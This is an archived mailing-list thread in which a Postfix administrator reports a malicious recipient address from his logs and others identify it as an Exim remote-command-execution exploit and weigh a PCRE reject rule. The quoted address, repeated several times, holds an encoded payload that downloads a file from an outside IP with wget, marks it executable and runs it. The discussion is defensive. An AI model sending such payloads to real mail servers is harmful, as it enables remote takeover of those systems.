command injection by crafted recipient address

Previous Topic Next Topic
 
classic Classic list List threaded Threaded
9 messages Options
Reply | Threaded
Open this post in threaded view
|

command injection by crafted recipient address

kris_h
Hey

i found this crazy recipient-address in my postfix-logs:

root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost

seems that someone tries to to downlaod something with wget, then chmod 'x'
and finally execute the downloded crap

Is there any chance, that postfix excutes such cracy stuff - maybe in PCRE
oder RegEx or somehere else ?

is there any not expected side effect when i add  /\$\{/  REJECT in a
check_recipient_access pcre-file ?

thanks in advance

Kris



--
Sent from: http://postfix.1071664.n5.nabble.com/Postfix-Users-f2.html
Reply | Threaded
Open this post in threaded view
|

Re: [External] command injection by crafted recipient address

Kevin A. McGrail

On 3/12/2020 4:40 PM, kris_h wrote:
> root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost

It's an exim exploit.  See CVE-2019-15846.

Regards,

KAM

Reply | Threaded
Open this post in threaded view
|

Re: [External] command injection by crafted recipient address

kris_h

> It's an exim exploit.  See CVE-2019-15846.

@KAM
Thanks a lot for this really quick reply!





--
Sent from: http://postfix.1071664.n5.nabble.com/Postfix-Users-f2.html
Reply | Threaded
Open this post in threaded view
|

Re: [External] command injection by crafted recipient address

Wietse Venema
In reply to this post by Kevin A. McGrail
Kevin A. McGrail:
>
> On 3/12/2020 4:40 PM, kris_h wrote:
> > root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost
>
> It's an exim exploit. See CVE-2019-15846.

The above is very similar to the Exim exploit for CVE-2019-10149 in
https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt

CVE-2019-15846 is related to a bug in Exim SNI support.

        Wietse
Reply | Threaded
Open this post in threaded view
|

Re: [External] command injection by crafted recipient address

kris_h
Hey Wietse,

thank you for this clearification.

What do you think about using the reject-recipient /\$\{/-rule?

Kris



--
Sent from: http://postfix.1071664.n5.nabble.com/Postfix-Users-f2.html
Reply | Threaded
Open this post in threaded view
|

Re: [External] command injection by crafted recipient address

Wietse Venema
kris_h:
> Hey Wietse,
>
> thank you for this clearification.
>
> What do you think about using the reject-recipient /\$\{/-rule?

As a temporary rule, it may have made sense when the Exim bug was new.

As a permanent 'deny' rule, it won't block new exploits.

        Wietse
Reply | Threaded
Open this post in threaded view
|

Re: [External] command injection by crafted recipient address

kris_h

> As a temporary rule, it may have made sense when the Exim bug was new.
> As a permanent 'deny' rule, it won't block new exploits.

yes, you're right, each PCRE-rule more is one more to be passed for each
recipient...

Thanks

Kris





--
Sent from: http://postfix.1071664.n5.nabble.com/Postfix-Users-f2.html
Reply | Threaded
Open this post in threaded view
|

Re: [External] command injection by crafted recipient address

Joe Acquisto-j4
In reply to this post by Wietse Venema
>>>
> kris_h:
>> Hey Wietse,
>>
>> thank you for this clearification.
>>
>> What do you think about using the reject-recipient /\$\{/-rule?
>
> As a temporary rule, it may have made sense when the Exim bug was new.
>
> As a permanent 'deny' rule, it won't block new exploits.
>
> Wietse

Seems these exploits only a concern if Exim is installed?  Or am I mistaken?



---------------------------------
       j4computers, llc
   Stone Ridge, NY 12484
        845-687-3734
   www.j4computers.com
---------------------------------
Reply | Threaded
Open this post in threaded view
|

Re: [External] command injection by crafted recipient address

Wietse Venema
Joe Acquisto-j4:

> >>>
> > kris_h:
> >> Hey Wietse,
> >>
> >> thank you for this clearification.
> >>
> >> What do you think about using the reject-recipient /\$\{/-rule?
> >
> > As a temporary rule, it may have made sense when the Exim bug was new.
> >
> > As a permanent 'deny' rule, it won't block new exploits.
>
> Seems these exploits only a concern if Exim is installed?  Or am I mistaken?

It could be an indirect attack: attacker -> Postfix -> Exim.
Hence, the filter may be useful while the bug is exploitable.

        Wietse